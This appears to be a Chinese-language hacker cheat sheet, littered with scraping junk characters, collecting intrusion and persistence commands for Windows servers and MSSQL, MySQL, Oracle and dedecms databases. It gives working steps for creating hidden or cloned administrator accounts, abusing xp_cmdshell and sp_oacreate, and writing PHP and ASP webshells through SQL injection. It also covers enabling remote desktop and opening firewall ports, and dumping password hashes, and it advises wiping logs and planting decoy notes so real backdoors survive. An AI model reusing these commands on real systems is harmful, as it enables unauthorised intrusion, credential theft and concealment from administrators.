* V) }, A" s6 e( g; r/ D. }1.net user administrator /passwordreq:no
$ b/ b" U) b2 f) e9 W1 V9 D, n4 q这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了( ^/ [, @( F4 |
2.比较巧妙的建克隆号的步骤
! ]" I- }0 `1 _% A8 T2 k先建一个user的用户# m+ j7 E0 g! s! Q
然后导出注册表。然后在计算机管理里删掉
8 t; V. g5 }* B在导入,在添加为管理员组1 p) @& ~/ v6 w8 K6 l/ E
3.查radmin密码
4 t3 ~1 b9 D, d2 Y, ?- V! Preg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
' p3 Z1 s8 n9 q/ z9 u+ ]9 s4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]+ Q+ O2 v# v$ W+ Y+ C* f8 Y9 F
建立一个"services.exe"的项
4 p1 B7 _9 a: ^- d再在其下面建立(字符串值)5 B+ s$ ~# w' x. |; i" i
键值为mu ma的全路径
7 k! O5 U) Z/ m+ L5.runas /user:guest cmd
; G. e4 M, M$ Z测试用户权限!
- ?) A+ y/ [7 s) K$ z+ O* d6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
8 y; i5 L0 m A7.入侵后漏洞修补、痕迹清理,后门置放:- o& R+ O" k- F# X) O$ w2 I
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门8 f2 y+ n, d5 b& [& V) i7 h
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
7 E0 X' G W ^# ?7 L$ F; D( o& w8 b4 G* V7 t
for example
& }8 X' T; Z! a1 M% W
- ?& @3 g; n* d1 }declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
: @& k" _+ g5 D. Z6 k" \) K
y. f1 x, u- ^& B5 t" \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'2 g ^3 V- a; i0 ?4 r, p+ b
" U% Q) ^1 ] d; T# E l; J8 K! \9:MSSQL SERVER 2005默认把xpcmdshell 给ON了3 _2 ]& _0 r# s+ i( }+ Y
如果要启用的话就必须把他加到高级用户模式& C8 o' c9 d. z% f
可以直接在注入点那里直接注入
8 }3 n' [9 I q" z0 k" H* pid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
1 J' w7 d0 ~# M) N# o1 [然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--; k1 P N% O% r/ L* c
或者. s! H/ Y8 x G; w8 _
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'# a1 h2 x3 J9 I: N+ B7 K) W
来恢复cmdshell。
/ v8 U3 G% [& W7 s/ i# f% v; s7 Y2 B% c/ E' y
分析器) H) T- j6 G2 r% a7 M6 a
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
% W( ~6 V! i" q然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll"), f E: \: \+ j+ a/ u7 v k
10.xp_cmdshell新的恢复办法
/ e9 w/ F* X1 c* uxp_cmdshell新的恢复办法
9 ]* y. C3 a6 L2 a3 D扩展储存过程被删除以后可以有很简单的办法恢复:
) P6 e; D2 Q9 V删除6 R- S1 s/ t0 ~% ]1 U/ B1 r
drop procedure sp_addextendedproc
4 K0 ^# m' b( A( ndrop procedure sp_oacreate) G/ b5 B) e" Z8 T3 T
exec sp_dropextendedproc 'xp_cmdshell'2 h6 t5 T' h% T9 n. K, L
, b5 u. t! Y( |
恢复
6 S# E% v3 [- Qdbcc addextendedproc ("sp_oacreate","odsole70.dll")5 h' @- [) L, ~9 B$ \; \8 J) e+ L* L
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
1 ?4 a& l0 T& z8 W- Y1 q5 w- C, Y) f" r+ P( e5 W
这样可以直接恢复,不用去管sp_addextendedproc是不是存在4 A4 l# F* k+ ?1 a5 D& ^1 ]$ h
$ Q& H! i) ?7 J. l% |* S
-----------------------------
, m1 D7 D# t' p! n& P3 c: J$ R, J! W# N9 Z
删除扩展存储过过程xp_cmdshell的语句:# [: J5 n V: o! C( j( P* P
exec sp_dropextendedproc 'xp_cmdshell'
3 r; D y+ X# ~# i5 H7 R
# \6 \+ Q' l8 w* \恢复cmdshell的sql语句- h# [+ u9 W, b$ L+ c
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
. V6 C" r7 c1 }2 Z: }# ^& T( s3 T: g$ F4 N/ U
! f0 c' W t+ H* K1 g+ E
开启cmdshell的sql语句
( T5 r" M/ i4 S1 V, i0 U" e5 A/ I3 ]) @& }+ u
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
3 e) a7 \# n: d7 G' V5 }8 m m5 Z) N [$ l6 D! V" ^
判断存储扩展是否存在
7 d9 N; b7 V/ H+ F$ n# Wselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
a! N7 e1 c! |9 ]* I返回结果为1就ok
# g$ C" u: H+ h3 R7 i4 A
* K5 Y2 W4 S1 h# n5 t; ?& J恢复xp_cmdshell
5 Q3 u) E- { F6 _3 n) @exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'3 ?2 z' I: u2 B* Z& C* o
返回结果为1就ok
) C* i! d* I8 I
. X0 |: u. M' V否则上传xplog7.0.dll
9 y2 t) w+ a: @8 I1 n+ P* o1 H8 Nexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
: ^% ]5 B: _! c7 \9 b: j0 Z: A% C/ a: w6 x+ O2 h2 s
堵上cmdshell的sql语句
$ y3 {8 N" G( ~4 \! {0 q: V% }! jsp_dropextendedproc "xp_cmdshel
' Y8 b) ]! z4 A( Q+ y) s6 }0 i8 y-------------------------- M% z% Q! F3 |; N* [& X3 i2 |
清除3389的登录记录用一条系统自带的命令:* p' m, G2 R8 W4 l X
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f6 B2 i0 J$ F8 q1 K; ]6 g- W
) Y5 B: X9 } J4 U9 i
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
: N- ?2 X s6 [( u6 a; l' U0 `在 mysql里查看当前用户的权限
/ C& g! x [& h1 v# P* ]; wshow grants for
; L$ B" a5 B4 V6 _7 S4 ^! v3 `0 f$ Y6 B% I
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
8 ]+ u: R; @& n8 d# H9 [$ f
- X1 f) C5 h/ f! s3 w$ a& O; @) k) Z. |2 y2 b
Create USER 'itpro'@'%' IDENTIFIED BY '123';
, C) b( r2 ~" a/ V, J' m4 I; q1 W* h' y8 {9 d' O8 S
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
! m, C5 A. i$ V; T) m# z2 ?' v r; O$ y- G
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0* k7 x7 A+ L. Y
) p, _6 e i- bMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;) K- r# p6 {8 b
% L2 ~4 p4 z. v9 T. `9 X
搞完事记得删除脚印哟。/ {: ?& |) p( J0 R" d% |$ v
; F) M0 u1 N/ x% a7 pDrop USER 'itpro'@'%';
/ H( Z5 K, O: x/ r3 Z1 P- q8 j7 g( Z3 U- p
Drop DATABASE IF EXISTS `itpro` ;
1 z! a/ h& [9 R# Q- V3 E' F1 J* H6 Y* J" b; v
当前用户获取system权限
$ x8 ? `7 F6 w( p5 M4 Dsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
+ {+ S; ?5 S8 ksc start SuperCMD. c& T4 C- l/ x1 ]6 I
程序代码, ?- w; P: {& q9 V' d* J; b
<SCRIPT LANGUAGE="VBScript">
# W& Y$ k& g1 K& B+ x0 fset wsnetwork=CreateObject("WSCRIPT.NETWORK")+ t# Z6 C. u* d7 H6 ]+ z0 z
os="WinNT://"&wsnetwork.ComputerName. \2 h. y- Q1 P% O. b8 g
Set ob=GetObject(os)
7 N- f" O1 _7 [) |+ YSet oe=GetObject(os&"/Administrators,group")% l% f' Z: E- s
Set od=ob.Create("user","nosec")
6 s' X: C. ~0 I4 M. q% x5 cod.SetPassword "123456abc!@#". M0 v* T* U+ G
od.SetInfo
/ O) U; D! ^8 O; RSet of=GetObject(os&"/nosec",user)3 n! s$ U' F8 Q
oe.add os&"/nosec"
9 |% r2 p2 q4 H2 I</Script>2 [7 Z& v) u9 D$ [2 p9 R% u
<script language=javascript>window.close();</script>
+ q5 i1 m! M# O3 ], u4 E$ l
, D, V9 o! A& H7 D2 ^- O, u* z) ?, _: ^, R$ _
( ]# }' z. k1 h8 p
! s, d3 ~; m9 c* i% A% }
突破验证码限制入后台拿shell
% T' e/ d$ Q, |" f3 ^7 m% M, T3 \2 |程序代码
5 [, t5 L, N6 q) M5 M3 W; j2 lREGEDIT4 # f+ o' t$ Q4 ?- i# Q" _
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
$ m' w) e; I- H' W1 Y"BlockXBM"=dword:000000000 w, E/ ^. ?' | A/ t; m4 W
9 I8 h% X$ Q( x8 K& l保存为code.reg,导入注册表,重器IE' r$ L' U2 `5 i, T" D
就可以了( V- X; ~' H4 j4 u5 n' v+ ~! j* l
union写马 q: F4 R1 ~8 ~* ~2 V
程序代码
3 r2 O9 d4 x, W9 u: Gwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*" X5 H& L6 z( a" a5 v
& K9 }- U# y' O- X9 u' ~$ X应用在dedecms注射漏洞上,无后台写马- \" X1 \2 ?- ]/ P, e
dedecms后台,无文件管理器,没有outfile权限的时候" X' B3 m9 C" g' f4 O
在插件管理-病毒扫描里
. a7 J2 `% x- v9 Z/ R! G$ P写一句话进include/config_hand.php里. ]! W6 C6 J O
程序代码; k; W0 e& m" ?! z8 j
>';?><?php @eval($_POST[cmd]);?>$ ~1 @# c! t5 }8 G/ ~" D5 e
; T l& Y/ d( ?
6 [1 ?1 i) ?6 i: K/ i如上格式
/ B4 \* L q, Y
& K3 i, @! M1 x/ I8 R) V5 N" \5 _oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解) d; z6 R7 }" ?. J, f
程序代码
4 J" U) X* ^" n9 V: f+ \9 H8 ~select username,password from dba_users;
- h2 v/ ]4 k5 T6 f# y" ^( x+ z- _( {* O) Z- c: r
* _9 {; s' h9 J- N: t
mysql远程连接用户( w" M' R6 J3 U' g4 \* Y" |
程序代码7 c/ G6 k7 i x' x! @; n1 A$ {
0 [, s! ~$ }6 Z: fCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
% ?" \& u- S: `GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
2 H4 e% u' C0 r& q7 QMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 00 u/ d4 r- _0 i/ t/ f0 t* }8 N
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
8 x7 P+ u6 w. Q" ~7 q% C
( g# w* g: w3 x. [
8 _4 s* g! M. H; d/ D G: @3 @0 e3 \" V, {) W* R
% F- L6 g: p& N
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
' B. G% S! `/ f7 J' J% d4 R4 ~5 r7 U1 E+ n; f+ q }9 }
1.查询终端端口) f# O3 I9 _0 K& J) A- T
: v# D0 ^) p' J- ~
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber* I3 N# J( ?6 D9 ~
+ u* Q8 J* f/ x) K# O, z2 G通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
o6 h! J% W4 D; Btype tsp.reg
( W6 s3 B0 w3 S; P+ ^. F) Q, o% ]5 S/ Y1 Q8 I8 t1 |
2.开启XP&2003终端服务
. e1 a# c1 n* s7 _" G1 X/ q0 E/ a; P! W9 k; W# L
4 L+ Z; T* B' o! TREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f8 [6 I* d; }3 r2 h+ l$ f
$ m: _( T9 [! a2 Z5 W: u/ x6 R* {# ]3 f( R
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f% N' Q4 s* X: @7 c! t2 E" o
% e7 X: @+ j$ ?( u L# }# j
3.更改终端端口为20008(0x4E28)
' e* M$ w; v$ w8 k$ I
1 f; [ X. V# ~( JREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
/ [0 U% t; q O1 h$ i) }+ W* }0 G) |3 {5 m& p9 _
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f9 y+ q5 t# v% @5 N$ b7 t/ k8 H
' S5 G: C6 |# ~
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制9 ~6 B$ `4 Q" P9 W" _
) t* U, K- E. J) C8 rREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f+ s/ ?) L1 u! E
6 s" ], u0 L7 a; Z; u+ P+ u) W& E: d/ ^* \/ y
5.开启Win2000的终端,端口为3389(需重启)
2 B4 j/ o) C" D) f, }, ?, w; I0 O, }2 [7 i/ ?& P
echo Windows Registry Editor Version 5.00 >2000.reg 8 I# p( B; w d, B
echo. >>2000.reg6 E2 t1 D; ?! J4 L4 _% X( l, [) \4 v
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 3 D8 U$ e% Y* B( ~. V- O
echo "Enabled"="0" >>2000.reg . S$ V. j0 c2 r- E Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
2 k2 D! @1 p I( I' ]echo "ShutdownWithoutLogon"="0" >>2000.reg ; d- b: i$ J8 |6 [3 f
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
* E Q% g8 }. e, n" }2 k0 necho "EnableAdminTSRemote"=dword:00000001 >>2000.reg : v) H$ N) `, ^* e+ t1 O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
6 ]9 O9 C' _1 u' Y2 ~5 `" N2 Eecho "TSEnabled"=dword:00000001 >>2000.reg
, x) V# o$ C9 V4 j, L3 ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ' E5 P- m h. Q$ M: D, f; M0 {7 i
echo "Start"=dword:00000002 >>2000.reg / C, V$ p9 e+ C2 Y+ W
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg / s( _$ d0 v0 [
echo "Start"=dword:00000002 >>2000.reg - a: B' r m) I
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 8 P8 b& Q- C' M
echo "Hotkey"="1" >>2000.reg 6 ^9 F* }$ Q- b* r( u2 ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
. b! z' T H1 @4 ]; V: U( ^1 aecho "ortNumber"=dword:00000D3D >>2000.reg 6 |+ q/ I7 z1 J0 `* `7 ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ! D7 I1 w; y3 {, b V# F! v
echo "ortNumber"=dword:00000D3D >>2000.reg! U. C& i" R# Z) t! m4 a! K
* W0 N, v' |- k$ f B) Q( b0 m6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)+ g2 i) O: H7 I) A7 v7 G2 E
3 G7 F! v' t+ q! c2 L4 j3 c@ECHO OFF & cd/d %temp% & echo [version] > restart.inf* ~: F: g7 u6 v$ x3 \
(set inf=InstallHinfSection DefaultInstall)# T) u) K, O. g2 Z
echo signature=$chicago$ >> restart.inf
( X1 V# G0 z/ V5 b, lecho [defaultinstall] >> restart.inf- q: W+ L/ G2 p
rundll32 setupapi,%inf% 1 %temp%\restart.inf
; `5 e1 P( |" ^* K) |- n- M- B
! k7 r3 [" D2 ]
) @9 h$ M* r" L, {* P$ |' t& J6 y7.禁用TCP/IP端口筛选 (需重启)
- A* O* A+ \$ X. `
6 m, m3 ?& F1 s) [REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
2 }, ~# P% U2 b7 F" @6 A& x3 g' t2 D# V: T6 \; m# H/ T
8.终端超出最大连接数时可用下面的命令来连接3 u: t( Q6 r+ e, H
$ i! l7 a2 R9 P0 O5 e! I4 w1 v. s1 K2 S
mstsc /v:ip:3389 /console
' k! D5 f$ Y) K& J
" c3 o6 I0 B, f* J$ ]' @! Q9.调整NTFS分区权限6 s% \6 ^) y) s: ]1 U
( s6 E% Q4 \3 y5 gcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)+ a$ {% W7 N; U; I
; @' s9 g7 d# S' f
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)8 b( ] s, h; M8 J6 F- K$ E
( u* t( H1 x* M% j
------------------------------------------------------
6 j# R' W" f, j# t( g3389.vbs / b& r8 \8 j( H T" t% A2 I5 ]
On Error Resume Next
' j: e- ~+ h9 x. t. V+ Kconst HKEY_LOCAL_MACHINE = &H800000028 j2 l4 B; w# n4 ^/ ~: {
strComputer = "."
6 W5 j/ e$ W/ j: {0 rSet StdOut = WScript.StdOut
4 @, W1 \* o) L. K" j" x) sSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_$ K( c7 o H$ Z9 U
strComputer & "\root\default:StdRegProv")
|1 n! Z6 [! Q) g/ H7 o9 b$ IstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
1 ~9 ~* d( W$ q }1 p4 o4 Voreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath% ] G) f" d! R
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
+ D% u$ J$ @3 U; h6 horeg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
( ^3 s( y: X% Z8 }. y: ustrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"6 s' ?& y8 h8 d: Y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
) v! D$ H# a# C1 y8 a, QstrValueName = "fDenyTSConnections"2 T- s5 ]. G3 n0 g- m
dwValue = 0
8 M# E( b- d! C- Toreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
9 Y' _0 G" s7 |& LstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"- C! I( S; `- z2 [3 ^6 _
strValueName = "ortNumber", K8 J" ~- d- T& f, o1 y, i
dwValue = 3389" I( |4 c8 j! e6 f
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue- l7 |+ c7 K" b' @. w
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
' @9 W0 f9 M% E, GstrValueName = "ortNumber"
8 `$ B) s8 C6 d7 ^3 p/ C. WdwValue = 3389
; [) B/ q" _% e5 E6 L$ w Horeg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue, X) @8 J/ E' H# A: i; J. q
Set R = CreateObject("WScript.Shell")
6 w0 A3 `/ u0 x# E3 ]# [R.run("Shutdown.exe -f -r -t 0") " n7 U8 P& C: p. [' j0 D. L
& a# s* _: E4 X3 C( q1 b
删除awgina.dll的注册表键值
* l6 `6 g3 g# k7 p: o$ h程序代码2 l' E. p, [" _7 j
8 s/ T3 K4 s5 m5 `' Q( g
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f7 L7 F. G% z: p) O# S" o
0 b; d% v: n) W9 g9 z1 Z0 E. C
. x. Y6 X" \" r7 Q4 {/ @5 K
, N& k8 q; e( \8 E# e/ l1 K. X! `( r: U
程序代码2 n! O& j+ g0 a S; }0 U
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
1 `$ Z0 B/ x$ x4 D) l' E; e
i1 n/ W% V; A) _) H3 G. A设置为1,关闭LM Hash
) ^! a1 h& X5 K
6 G7 T* C: Q, c- X3 e, r! `1 h数据库安全:入侵Oracle数据库常用操作命令
2 `! S2 ^9 T/ T2 j% O最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
5 q, ]0 H8 j1 I _ c3 ]1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
" m% t( u2 D! b% @; r9 B8 L2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
( _4 X9 \; e' U9 h5 d" I3、SQL>connect / as sysdba ;(as sysoper)或
" b! S" G, b3 J' Q7 p8 D' oconnect internal/oracle AS SYSDBA ;(scott/tiger)
# Q5 B7 f% R/ }: h- O1 u% f' Wconn sys/change_on_install as sysdba;
3 s8 M% ]! t& T# D% _4、SQL>startup; 启动数据库实例, Q. M. W$ M3 Z; m) P
5、查看当前的所有数据库: select * from v$database;6 \3 f; X! K" ?4 [, s
select name from v$database;
$ }0 P+ d7 P! V6、desc v$databases; 查看数据库结构字段
2 S8 k4 Y( d" G8 `( y. o- Y- f7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:& _+ U7 l! x- k- `/ |! Z/ ?
SQL>select * from V_$PWFILE_USERS;5 g/ X' v* a* ]1 Q5 D# e# w, S
Show user;查看当前数据库连接用户
- i1 F- U `' A* U8、进入test数据库:database test;* M% T- L2 ]# D# B
9、查看所有的数据库实例:select * from v$instance;
' y u8 Q' m& U/ R6 m如:ora9i
5 O/ s* y4 k$ o. T6 q* P. j, X10、查看当前库的所有数据表:" }; D# i2 b5 q6 K; ?* {7 r# f
SQL> select TABLE_NAME from all_tables;
2 I- d9 p5 b6 j3 l! G. [select * from all_tables;+ i0 K2 Q2 ~! _3 m! O' S' }
SQL> select table_name from all_tables where table_name like '%u%';
5 p# m1 L' e4 DTABLE_NAME& k! O5 j- Q6 [
------------------------------
$ C9 a( m0 X8 j2 }' K) __default_auditing_options_
$ C" Z1 W- m( R: i/ T0 a, k11、查看表结构:desc all_tables;: B6 v( e6 ?* Z) m+ t) p' m4 e! c
12、显示CQI.T_BBS_XUSER的所有字段结构:# V0 I) O Y% O
desc CQI.T_BBS_XUSER;- Y# p$ q3 W& Q0 }6 V# X
13、获得CQI.T_BBS_XUSER表中的记录:) X+ N) z# a2 D9 y( F1 Z
select * from CQI.T_BBS_XUSER;! J+ Q. s% b) @+ |' ^
14、增加数据库用户:(test11/test): n/ h2 r9 s9 \+ u; D0 @0 P1 t
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
( t/ p, Q% h4 B3 R% K, }15、用户授权:5 K3 g9 n% Q' t& i
grant connect,resource,dba to test11; d; v+ f- j) O0 m
grant sysdba to test11;8 I8 c" H5 D, [/ `$ o2 J6 ~
commit;. _% `! B J) ^
16、更改数据库用户的密码:(将sys与system的密码改为test.)
% K9 E2 E, v& \alter user sys indentified by test;( v6 g, Q+ w% W' b: Z5 K
alter user system indentified by test;
/ I0 J- O/ v8 S1 A. N0 E' s
" A% H5 F) h q8 ZapplicationContext-util.xml
x6 R5 S# R8 u- q& HapplicationContext.xml7 \% @/ c! v( x1 o2 O! w K" v: w' }
struts-config.xml2 d% o4 e4 J9 k3 ?9 F- Z* \1 ^5 s* g
web.xml) e+ ]. t5 h# i+ t) i* d
server.xml
4 d& U& d5 w& \3 `* n) \$ E, Z' N, A. Atomcat-users.xml
/ p v( j* {) |. Z. c# ahibernate.cfg.xml
! E1 R2 C" A2 V+ Ddatabase_pool_config.xml
1 r3 z: y# C8 y$ G& V0 i+ Z9 n) J* `( h
. e; s, k4 Q& F% u( n/ z' N
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
( N4 S8 z$ r# j! G\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
: E; x+ |; x$ x0 H" m, d\WEB-INF\struts-config.xml 文件目录结构, F! U' N6 P E3 F3 _
3 t. E4 d+ K4 ]9 [spring.properties 里边包含hibernate.cfg.xml的名称
# h; `* ^+ D: _+ l
4 `2 J' s- W( ~6 P
8 U2 \( n1 J( Z5 p* v+ ]C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml ^3 G' ^* Y( ?& K9 R& {& m$ @) N" a
+ V8 ]3 U# [: d% R如果都找不到 那就看看class文件吧。。$ Y2 l* Y4 y9 h8 S, k8 @
9 l/ f5 f; \9 H& ^9 |0 o$ a8 _测试1:
+ E$ N& q' K6 d! g hSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1' N9 `# |0 A- @! W( d
' D: Q) n8 D: O [/ ?# o
测试2:
- j; s9 D1 v: g& P" k' g
! U4 F) Y& b7 C8 G* Acreate table dirs(paths varchar(100),paths1 varchar(100), id int); J( U+ n3 ]) u5 w' y( n2 x- X
6 c+ y. H8 ?" } P/ ddelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--. d$ S/ Q: E6 S+ X0 r
$ K' o6 @6 P- l1 l* r0 r2 BSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
7 H1 J! K# R7 g* L* D0 d# [$ r0 G9 ]
查看虚拟机中的共享文件:0 M( h' `8 _) |1 z
在虚拟机中的cmd中执行
- v9 U- H4 R! x\\.host\Shared Folders4 h( v; q, ?. h8 u6 w8 r: n' @
0 M0 u( N* r( f! ~5 x) Ocmdshell下找终端的技巧: s3 _0 w& `9 H$ ^6 ~ S6 E" x
找终端:
% V+ \% Z. \& Z) H第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! , S5 D M# T/ f- l% o* X' q
而终端所对应的服务名为:TermService
5 q$ r6 w" G) p8 q5 j第二步:用netstat -ano命令,列出所有端口对应的PID值!
! Q/ V% q; S% k& t* I 找到PID值所对应的端口/ J% i1 Q+ G' U. N4 c8 c
# w9 l3 L& Q) M" a" W7 Y/ E
查询sql server 2005中的密码hash
6 H7 b- e6 L. J: ASELECT password_hash FROM sys.sql_logins where name='sa'
' t& w; _$ K9 ]7 r' ySELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
: O8 g! i# ?7 E1 x" Saccess中导出shell2 v3 S8 j$ h2 [5 {% O/ J) V' T8 G
; e- m7 ]% ?5 {3 t/ i) e" L3 D( v中文版本操作系统中针对mysql添加用户完整代码:/ w$ r8 I3 P; n+ D7 P
9 J5 g M X% Q0 h1 y/ zuse test;, Q8 o/ e: E. y
create table a (cmd text);" ?" O+ ?6 U8 {/ w& [/ H2 Y6 h
